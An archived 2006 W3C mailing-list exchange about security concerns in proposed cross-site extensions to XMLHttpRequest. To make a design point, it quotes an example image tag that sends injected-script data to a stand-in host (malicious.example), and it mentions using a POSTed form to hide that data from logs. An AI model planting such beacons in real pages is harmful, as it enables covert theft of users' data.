W3C home > Mailing lists > Public > public-webapi@w3.org > April 2006

Re: (XMLHttpRequest 2) Second proposal for cross-site extensions to XMLHttpRequest

From: Bjoern Hoehrmann <derhoermi@gmx.net>
Date: Tue, 18 Apr 2006 15:12:36 +0200
To: Ian Davis <ian.davis@talis.com>
Cc: public-webapi@w3.org
Message-ID: <q5p942pvd6720ie14td9780tfu90c973in@hive.bjoern.hoehrmann.de>

* Ian Davis wrote:
>On 18/04/2006 13:01, Bjoern Hoehrmann wrote:
>> If you are able to inject some script you can send any and all data you
>> are able to obtain to a third party, in a simple case you could just
>> append the data to a new <img src="http://malicious.example/?data=...">.
>> So I don't think I understand your concern, could you elaborate?
>
>You're right of course, but it's much easier to hide the data being sent 
>from logs and browser history if you use POST.

In HTML implementations this is generally possible aswell, using a
<form> with method=post and the .submit() method.
-- 
Björn Höhrmann · mailto:bjoern@hoehrmann.de · http://bjoern.hoehrmann.de
Weinh. Str. 22 · Telefon: +49(0)621/4309674 · http://www.bjoernsworld.de
68309 Mannheim · PGP Pub. KeyID: 0xA4357E78 · http://www.websitedev.de/ 
Received on Tuesday, 18 April 2006 13:12:43 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Tuesday, 8 January 2008 14:18:54 GMT